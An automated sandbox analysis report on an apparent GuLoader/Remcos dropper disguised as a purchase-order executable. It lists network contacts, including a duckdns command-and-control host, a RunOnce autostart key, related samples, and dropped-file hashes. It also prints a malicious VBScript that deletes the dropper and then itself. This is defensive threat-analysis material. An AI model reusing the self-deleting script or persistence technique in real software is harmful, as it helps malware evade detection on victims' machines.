                                                                                                              https://2542116.fls.doubleclick.net/activPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://2542116.fls.doublePURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhvAF21.tmp.137.drfalse
                                                                                                                  high
                                                                                                                  https://www.msn.com/de-ch/?ocid=iehpbhvAF21.tmp.137.drfalse
                                                                                                                    high
                                                                                                                    https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                                                                      high
                                                                                                                      https://cdn.taboola.com/TaboolaCookieSyncScript.jsbhvAF21.tmp.137.drfalse
                                                                                                                        high
                                                                                                                        https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhvAF21.tmp.137.drfalse
                                                                                                                          high
                                                                                                                          https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhvAF21.tmp.137.drfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhvAF21.tmp.137.drfalse
                                                                                                                              high
                                                                                                                              https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhvAF21.tmp.137.drfalse
                                                                                                                                high
                                                                                                                                https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.jsbhvAF21.tmp.137.drfalse
                                                                                                                                  high
                                                                                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhvAF21.tmp.137.drfalse
                                                                                                                                    high
                                                                                                                                    https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.google.com/pagead/drt/uiPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                                                                                        high
                                                                                                                                        https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.jsbhvAF21.tmp.137.drfalse
                                                                                                                                          high
                                                                                                                                          https://sb.scorecardresearch.com/beacon.jsbhvAF21.tmp.137.drfalse
                                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://pki.goog/gsr1/gsr1.crt02bhvAF21.tmp.137.drfalse
                                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://pki.goog/repo/certs/gts1c3.der0$bhvAF21.tmp.137.drfalse
                                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.bhvAF21.tmp.137.drfalse
                                                                                                                                          • 0%, Virustotal, Browse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhvAF21.tmp.137.drfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://get3.adobePURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7cabhvAF21.tmp.137.drfalse
                                                                                                                                            high
                                                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvAF21.tmp.137.drfalse
                                                                                                                                            • 0%, Virustotal, Browse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            94.156.8.104
                                                                                                                                            unknownBulgaria
                                                                                                                                            43561NET1-ASBGfalse
                                                                                                                                            172.94.9.228
                                                                                                                                            janbours92harbu01.duckdns.orgUnited States
                                                                                                                                            3223VOXILITYGBtrue
                                                                                                                                            178.237.33.50
                                                                                                                                            geoplugin.netNetherlands
                                                                                                                                            8455ATOM86-ASATOM86NLfalse
                                                                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                            Analysis ID:1432013
                                                                                                                                            Start date and time:2024-04-26 09:39:01 +02:00
                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 17m 16s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                            Run name:Suspected Instruction Hammering
                                                                                                                                            Number of analysed new started processes analysed:141
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample name:PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@395/17@10/3
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 80%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 88%
                                                                                                                                            • Number of executed functions: 153
                                                                                                                                            • Number of non-executed functions: 314
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.137.103.96
                                                                                                                                            • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, array803.prod.do.dsp.mp.microsoft.com
                                                                                                                                            • Execution Graph export aborted for target PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PID 7048 because there are no executed function
                                                                                                                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                            TimeTypeDescription
                                                                                                                                            08:41:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Nomap C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exe
                                                                                                                                            08:41:58AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Nomap C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exe
                                                                                                                                            09:42:26API Interceptor20299871x Sleep call for process: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe modified
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            178.237.33.50DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            geoplugin.netDHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            VOXILITYGBuvaXiyELu9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                            • 104.250.189.207
                                                                                                                                            https://operationalservice.com.bas-korae.com/w?cms=joerg.donner@daiichi-sankyo.deGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 185.171.187.163
                                                                                                                                            https://microsoftonlineservice.com.general-meel.xyz/w?cms=mr.been@uk.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 185.171.187.163
                                                                                                                                            bTf3.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                            • 172.111.139.95
                                                                                                                                            bTkg.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                            • 172.111.139.95
                                                                                                                                            bTkd.exeGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                                                                            • 172.111.139.95
                                                                                                                                            Runner.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                            • 172.111.139.245
                                                                                                                                            kgjgrpLNSB.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 5.254.81.205
                                                                                                                                            1.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • 104.243.242.194
                                                                                                                                            bTa0.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                            • 172.111.136.105
                                                                                                                                            NET1-ASBGDHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                            • 87.121.105.163
                                                                                                                                            xtnhsVjQTxvH.exeGet hashmaliciousQuasarBrowse
                                                                                                                                            • 94.156.79.26
                                                                                                                                            o4883TEQGB.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            Id2uxwyyf8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            Y4pblBbDQc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            C5fMgX1ZyY.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            6fV4tfoJp2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            fqEpqMWF6r.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            D0dhEeGfv4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            IrnO5ZI3En.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 94.156.8.9
                                                                                                                                            ATOM86-ASATOM86NLDHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            lmg1_Mlakaifa443456.vbsGet hashmaliciousAsyncRAT, DcRat, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            UrgenteNotificationRef.cmdGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            1713934625194381993b7036c2f81df0c4f94527f4e7bb43abdf90d09e24f7ee13cf33c8d8678.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            No context
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dllseDzEfSLFg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                              seDzEfSLFg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                Sipari#U015f_#U00d6zellikleri.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  Sipari#U015f_#U00d6zellikleri.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                    Factura_0104109174pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                      Factura_0104109174pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        Transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                          Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            invoice4346.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):988
                                                                                                                                                              Entropy (8bit):5.017252251492273
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:qbhdRNuKyGX852sesPvXhNlT3/75ciWro:EPN0GX85TrPvhjTl2ro
                                                                                                                                                              MD5:E4770650EE785F258DAD304DD5E155EF
                                                                                                                                                              SHA1:70F2480E51BA17AF9EB8017520318886F329CF92
                                                                                                                                                              SHA-256:284426DFD8A63AE3A1BE9DC0D677AD34743EBE7ED5E9E467DAC7D125AE83E6C8
                                                                                                                                                              SHA-512:A9E1418FF18350975E82056C9FBCA07DFC02A5B16444AFEB64BAA65E8D61BECB53179A29AEFCA48C8361818CA5F34DAB3FEB43CC3D4D29A20A9D6A245CAF0681
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{. "geoplugin_request":"154.16.49.41",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfae478d5, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41943040
                                                                                                                                                              Entropy (8bit):1.3254023128661632
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24576:+vzYColdrolZZhrO647tP4fY9MkfvaTmTMbmhMsmVJDQgGElg9joRBg/Ji7AmaLb:3r2ZgyfY9lqZDQgGJtLu2
                                                                                                                                                              MD5:49163A1E793D160EB0AF573F2D7DA93A
                                                                                                                                                              SHA1:0050084F660F14EF86891F533665901385B3EE89
                                                                                                                                                              SHA-256:CB9EB048F3E8FD903F8FEC49631018BB35355DD06E1B89E02C4A4F988A4F8F03
                                                                                                                                                              SHA-512:F2F40B2116F373231C95AB8EE3A31480A313B0A83448DB313270DC1552E7BBC09F9A0CB4DE7387CE8BEEE0F1FF993B3B5170A7548883801E2FB44AB93E7DD946
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..x.... ....................*...y........................?.@..."(...|!.3)...|..h.A.@.........................Be ....y7.........................................................................................................bJ......n...............................................................@...@....................................... .......1....|!.............................................................@...........................................................................................................................N...:....y!.................................2 .}3)...|.{....................3)...|..................@........#......h.A.@...................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2
                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:..
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11264
                                                                                                                                                              Entropy (8bit):5.724200018297216
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:qIsUxO9udx4qYp7AJb76BykUbQMtHUOA5Iv+RnsrqeXV+d1g2IW9t2c+cEwF9Fug:ZVL7ikJb76BQUoUm+RnyXVYO2RvHFug
                                                                                                                                                              MD5:6AD39193ED20078AA1B23C33A1E48859
                                                                                                                                                              SHA1:95E70E4F47AA1689CC08AFBDAEF3EC323B5342FA
                                                                                                                                                              SHA-256:B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
                                                                                                                                                              SHA-512:78C89BB8C86F3B68E5314467ECA4E8E922D143335081FA66B01D756303E1AEC68ED01F4BE7098DBE06A789CA32A0F31102F5BA408BC5AB28E61251611BB4F62B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                              • Filename: seDzEfSLFg.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: seDzEfSLFg.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Sipari#U015f_#U00d6zellikleri.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Sipari#U015f_#U00d6zellikleri.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Factura_0104109174pdf.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Factura_0104109174pdf.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Transferencia.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: Factura_1-000816pdf.exe, Detection: malicious, Browse
                                                                                                                                                              • Filename: invoice4346.exe, Detection: malicious, Browse
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....e.Q...........!.................&.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...h....@.......&..............@....reloc..H....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):6656
                                                                                                                                                              Entropy (8bit):5.028420190047439
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:96:Q7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgNF38:aygp3FcHi0xhYMR8dMqJVgN
                                                                                                                                                              MD5:052A077EE8B519AADBCF29E6B5E710A4
                                                                                                                                                              SHA1:B3AB29D0EBDBDCA63E4DFFD2FD2E6B9188FFAE4B
                                                                                                                                                              SHA-256:9A1A5C6F598247BFA52624CD793B9EF4FB85863CC9DFD69EB7EF671CACC906C9
                                                                                                                                                              SHA-512:CB11CBA331B85122DCC2D57171CE20382AF0A9FDF0A85A30155404D975901A313C9285EB9445E51979C6EC8416CCDF97FDEAF1BD2203C9395AD046A385A90009
                                                                                                                                                              Malicious:false
                                                                                                                                                              Antivirus:
                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....e.Q...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):576
                                                                                                                                                              Entropy (8bit):3.581446539436272
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:xQ4lA2++ugypjBQMPURbf0i72o5n4Q3DAf0i72o5n49Hz/0aimi:7a2+SD1v72o54QTQv72o549Aait
                                                                                                                                                              MD5:85C57D9823C3C6A4E0FC5807053BB3E6
                                                                                                                                                              SHA1:493EEBFCEC60644E2E522CD3423ABB08B7C33923
                                                                                                                                                              SHA-256:6597C67980E2C6FFE9FD4D7E9CEE3EF180259AF1A82D03C8623B3B95796E13A4
                                                                                                                                                              SHA-512:9D9EBAFC79CB3722FA7CE28E42EFFA89EAD010DB88DBBD1A0287788EA98C0A1AFEF7D865C4471902A9699022D8DDF2D4F90B11CF06C7438A5C0843C8821B7356
                                                                                                                                                              Malicious:true
                                                                                                                                                              Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.e.s.k.t.o.p.\.P.U.R.C.H.A.S.E.O.R.D.E.R.S.H.E.E.T.&.S.P.E.C.I.F.I.C.A.T.I.O.N.S.D.O.C...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.e.s.k.t.o.p.\.P.U.R.C.H.A.S.E.O.R.D.E.R.S.H.E.E.T.&.S.P.E.C.I.F.I.C.A.T.I.O.N.S.D.O.C...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                                                                                                              Process:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):771320
                                                                                                                                                              Entropy (8bit):5.920917801812331
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6144:9zZzl4awJ9Gal0ZcMGDTBRA5bASrGs/1iLJ0ca8EptqioUCaSniaVgkpmcqaw/c0:DaalkPhH8V/kLBa8CwioQAxjw/ar4vd
                                                                                                                                                              MD5:DBE4440D32DC0B20DEE76C192587AB33
                                                                                                                                                              SHA1:D5C94559655C5FC5BC552FCE62AAD8673731A3BB
                                                                                                                                                              SHA-256:8059DC704B71F1A978547729E4AFDF62F0C834950758CA8BB6A25FA6FCA0B03D
                                                                                                                                                              SHA-512:13EEA3B51FCE84B90B363DE9B05F6E08FA0C082B67F0BE91146F241AB49F7D421FEC5D81B5507C6DF396BDBA21E71B6CEF176F8A70A0D972C11CF2AD7D768EFA
                                                                                                                                                              Malicious:true
                                                                                                                                                              Antivirus:
